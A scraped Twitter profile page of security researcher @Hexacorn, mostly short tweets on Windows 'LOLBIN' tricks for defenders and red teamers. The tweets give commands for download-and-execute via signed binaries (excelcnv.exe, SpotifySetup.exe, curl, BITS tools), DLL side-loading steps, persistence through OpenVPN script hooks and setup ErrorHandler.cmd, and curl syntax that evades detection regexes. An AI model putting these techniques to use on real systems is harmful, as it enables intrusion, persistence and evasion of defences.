Adam
@Hexacorn
Followers
24,447
Following
1,257
Media
362
Statuses
6,370
Red Brain, Blue Fingers hexacorn @infosec .exchange RIP Twitter
Joined January 2012
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Rio Grande do Sul
• 201547 Tweets
Madonna
• 156305 Tweets
Bucks
• 74997 Tweets
Dame
• 58630 Tweets
Knicks
• 53496 Tweets
Racing
• 53112 Tweets
Pacers
• 45184 Tweets
Sixers
• 34213 Tweets
#911onABC
• 32151 Tweets
bruno mars
• 28205 Tweets
憲法改正
• 27325 Tweets
Pabllo
• 26750 Tweets
dua lipa
• 22312 Tweets
Giannis
• 21496 Tweets
Rony
• 20947 Tweets
Bruins
• 15629 Tweets
Anne Hathaway
• 15150 Tweets
Costas
• 14848 Tweets
Lillard
• 14237 Tweets
#SnowMan結成12周年
• 13473 Tweets
76ers
• 12529 Tweets
Arias
• 12285 Tweets
Estevão
• 11858 Tweets
#LeafsForever
• 11422 Tweets
Talleres
• 10575 Tweets
Pinned Tweet
This tweet contains a well-researched information presented in a politically neutral manner and can only be interpreted in a single way w/o causing any emotional response to the reader. It is factual. It is unconditional. It is absolute. It is uncancellable.
#FF
you
0
1
34
This is the most important security change you will do today.
1. Find c:\Program Files\Common Files\microsoft shared\OFFICE15\1033\MSOINTL.DLL
(adjust path for your Office version).
2. Hex-edit "Enable Content" to whatever you want e.g. "Infect System".
3. You are welcome.
56
1K
4K
Run
\Windows\system32\oobe\FirstLogonAnim.exe /RunFirstLogonAnim
to prank your friend Windows is reinstalling
17
180
995
C:\Program Files*\Microsoft Office\root\Office*\excelcnv.exe
accepts URL so you can use it as a downloader
excelcnv.exe -oice <URL> <filename>
caveat? your download will be saved as an XLSX and binary data will be stored encoded with UTF8 inside xl\sharedStrings.xml
#LOLBIN
10
293
841
DO NOT TRY ON YOUR PRODUCTION SYSTEM*
ms-cxh-full://foo
will block your win10 desktop (doesn't work on win11)
DO NOT TRY ON YOUR PRODUCTION SYSTEM*
*atm I don't know how to exit the thing
15
105
495
reminder that Powershell resides in many places
c:\WINDOWS\
- \system32\WindowsPowerShell\v1.0\powershell.exe
- \SysWow64\...\powershell.exe
c:\Program Files | c:\Program Files (\x86)
\PowerShell\
- \6.0.0.14\powershell.exe
- \6\pwsh.exe
- \7-preview\pwsh.exe
+other subdirs
7
166
441
A nice, little Downloads&Execute
#LOLBIN
feature of signed SpotifySetup.exe
SpotifySetup.exe --url <url>
Other options
--mu ..\..\..\..\..\..\..\..\test\ downloads that file to c:\test\SpWebInst0.exe and launches from there
-- silent - quieter, but mini-GUI still shows up
2
129
341
Red Team Tip: always rename your offensive tools to AppsHelpMechanismTestAppBadMsgBlocked.exe before running
#helpblueteamwin
!
7
46
338
I wrote about side-loading of MSFTEDIT.DLL before and today realized that charmap.exe uses LoadLibrary as well
1. save payload as MSFTEDIT.DLL
2. copy c:\windows\system32\charmap.exe .
3. charmap.exe
3
113
315
If Broadcom buys VMware the RCE analysts working there will be called Broadcom VMware CarbonBlack CA Technologies Symantec Norton Lastline Reverse Code Engineering Analysts
10
48
303
in case you have not noticed, Process Hacker includes a Firewall tab now
7
60
274
QUICK !
GIT CLONE
8
69
273
If you rely on CommandLine in Sysmon, you may want to check this out. And I am almost certain someone did point it out before... oh well...
examples:
c:\windows\system32\calc.exe\..\notepad.exe
c:\windows\system32\calc.exe\..\..\system32\notepad.exe
9
95
265
looks like Windows tar can BASE64-encode and UUEncode
tar -c -f <out> --b64encode <in>
tar -c -f <out> --uuencode <in>
and it can run (lolbin) other programs same as its *nix counterpart
tar -cff --use-compress-program calc f
4
114
261
a silly way to launch programs at a predetermined position in a great-great-great....grand-child relationship
start /b "" start /b "" start /b "" start /b "" start /b "" start /b notepad.exe
/b takes care of conhost.exe processes (aka all share same console)
7
56
230
openvpn.exe --config "test.ovpn" --auth-user-pass "pass.txt" --up c:\windows\system32\calc.exe --ipchange c:\windows\system32\calc.exe --route-up c:\windows\system32\calc.exe --script-security 2 > foo
in action
more
#LOLBIN
details here:
TIL OpenVPN cmd line args are \o/bin cool ;)
Persistence +
#LOLBIN
in 1
--script-security 2
+
--auth-user-pass-verify #
--client-connect #
--client-disconnect #
--down #
--ipchange #
--iproute #
--learn-address #
--route-pre-down #
--route-up #
--tls-verify #
--up #
# = cmd
2
29
121
2
87
238
Great paper that tries to make some sense of Windows persistence mess
2
73
229
so, how many of you visited solar leaks page from your main working computer, on your production network?
the number of infosec people posting a direct link to it is mind-blowing
assumption should be it's hosted by attackers, hello ?
14
41
203
modexp/odzhan created another code injection PoC - this time WNF
0
141
205
combing through my old code I found one of my early API hooking experiments from early 2006 -- by hooking ExtTextOut was able to steal text from any application (global hook was there to catch new programs as well) -- I guess should have written that EDR back then ;)
2
35
204
Certulitis - one tool that keeps on giving
e.g.
set CERTSRV_LOGFILE=c:\test\foo.log
set CERTSRV_DEBUG=0xFFFFFFFF
certutil you never knew existed (good clickbait!)
3
73
202
what are download cradles out there?
I know of this nice list
any other repos like this?
IE/VBS, python, ruby, perl, gcc, git, wget, curl with exec/eval?
6
61
190
This is a far more interesting 'feature' of setup.exe - a persistence trick really
Drop your payload to
c:\WINDOWS\Setup\Scripts\ErrorHandler.cmd
and c:\WINDOWS\system32\oobe\Setup.exe will load it anytime it errors (at least; enough to run it w/o cmd line to trigger)
0
50
179
curl (included Windows version) built-in support for parenthesis and square brackets is fun and may evade some naive regexes
curl {
http://...}
curl {h}{t}{t}{p}://...
curl .../{foo}{bar} -o
#2
#1
// will save the downloaded file as "barfoo")
curl [1-5]
// awkward delay via DNS
3
54
181
It's really worth updating Process Hacker on regular basis
TIL new versions include very advanced PE file viewer showing lots of cool info, both static and dynamic and from the file and file system, all in one place
2
36
158
In 2010 I worked a case working 18h/day, for a month, developed insomnia. Didn't get any extra pay, no one said thank you. It changed the way I work. I then started my blog. 10 years later still not sleeping enough & yet still loving it. Channel your obsessions properly kids :)
8
19
151
pretty cool resource related to anything autoit
1
55
147
Can we please have Dutch intelligence release these tapes of SolarWind hackers in action so we can all move on?
2
17
138
if you ever get bored using "copy" to copy files you can always use ... curl
curl file://c:\test\foo -o bar
same way, you can use it instead of "type" or "cat"
curl file://c:\test\foo
4
41
141
Copy c:\WINDOWS\system32\oobe\Setup.exe to c:\test
Drop payload to c:\test\winsetup.dll
setup.exe will load c:\test\winsetup.dll
lots of other side-loading opportunities there really 9see screenshot), but still lame, cuz need admin rights to run setup.exe :(
2
39
137
win10
drop C:\Windows\System32\ntwdblib.dll
run c:\WINDOWS\system32\cliconfg.exe
ntwdblib.dll will get loaded
too many caveats (admin rights, UAC) for it to be useful, but always...
kinda lame persistence trick, kinda lame lolbin - 2 in one lame :)
3
37
132
Powershell keywords: what stuff do you look for inside the Script Blocks?
This is a great cheatsheet that contains a lot of keywords (by Malware Archaeology)
but wondering if this could be improved. reversed strings? new keywords for new ps modules?
6
31
128
Did anyone look at w32tm.exe for C2 comms?
w32tm /monitor /computers:xxx
w32tm /stripchart /computer:xxx
W32tm /query /computer:xxx
connect out to xxx:123
w32tm /stripchart /computer:xxx /ipprotocol:6
will use IPv6
2
28
123
fun fact: you can add new lines to PDB path, so IDA can read it like this
6
14
123
Fun fact, you can bring win10 explorer.exe to win11 and it will work :)
7
12
122
TIL OpenVPN cmd line args are \o/bin cool ;)
Persistence +
#LOLBIN
in 1
--script-security 2
+
--auth-user-pass-verify #
--client-connect #
--client-disconnect #
--down #
--ipchange #
--iproute #
--learn-address #
--route-pre-down #
--route-up #
--tls-verify #
--up #
# = cmd
2
29
121
0
56
117
Printing
#LOLBIN
create dummy file (foo)
copy rundll32.exe to c:\test\rundll32.exe
copy DLL payload to c:\test\photowiz.dll
run
rundll32 c:\WINDOWS\system32\shimgvw.dll,ImageView_PrintTo c:\test\foo
ImageView_PrintToA & ImageView_PrintToW should work too (W needs Unicode tho)
2
34
116
Don't know how I missed this -- & -- RCE via Yara sigs is a nice eye-opener for anyone using them in production env. or 'en masse' in general
1
73
116
insipred by
@SentinelOne
research on desktopimgdownldr
here is a list of native exes using BITS to download stuff...
#LOLBIN
potentials
❓aitstatic
✔️bitsadmin
✔️desktopimgdownldr
❓DeviceEnroller
❓directxdatabaseupdater
❓MDMAppInstaller
❓SpeechModelDownload
1
47
116
Excelling with sysmon configs yes, it is what it sounds like; a totally cringeworthy experience :) kudos to
@ionstorm
for his sysmon config that I tortured with this idea
#threathunting
#dfir
2
36
111
@lkarlslund
couldn't resist :)
this is what's inside the 700MB Nvidia driver
top file extensions
json408
dll341
png124
inf61
pak57
exe57
txt46
nvi33
js32
strings31
htm31
forms28
svg18
sys15
node11
lib10
bin9
2
1
109
Just in case you are wondering, Mitre Att&ck misses and quite a bit. This is not a criticism per se -- it's a great framework and work in progress. These things will be eventually added (and sometimes corrected).
15
17
105
ms-cxh - the Cloud Experience Host handler has some interesting strings it accepts e.g.
ms-cxh://SETADDLOCALONLY creates new user
ms-cxh://NTHNGCUPSELL creates PIN
ms-cxh://RDXRACSKUINCLUSIVE get latest demo content and apps
full list
3
18
101
today got an idea to look at .TLB files as a possible code injection trick (it has a built-in, but rarely used 'helpstringdll' reference that points to a DLL)
after some googling discovered
@StanHacked
already did a great research on this topic!
0
35
98
Fun fact: Qbot seems to be using GetFileAttributesW "C:\INTERNAL\__empty" to detect Defender's emulation
String reference:
3
35
98
You got your Sysmon config
You plug it in to your ELK/Splunk
Detections start coming in and are tagged with Mitre Att&ck techniques
2 Questions:
- How do you refer to these detections, if at all?
- How do you process / analyze them? (alert/dashboard/?)
genuine Qs
15
9
96
fun fact:
if you append any .cab files to extrac32.exe, then when you run this new file, extrac32.exe stub will extract the content of the appended .cab file w/o any question; I guess files with _A_EXEC attr should be executed (have not tried)
3
20
94
TIL there is cbd.exe in VMware Workstation
c:\Program Files (x86)\VMware\VMware Workstation\OVFTool\cdb.exe
cc
@Oddvarmoe
perhaps worth updating
can help to dump memory, and lots of other funny stuff
2
25
92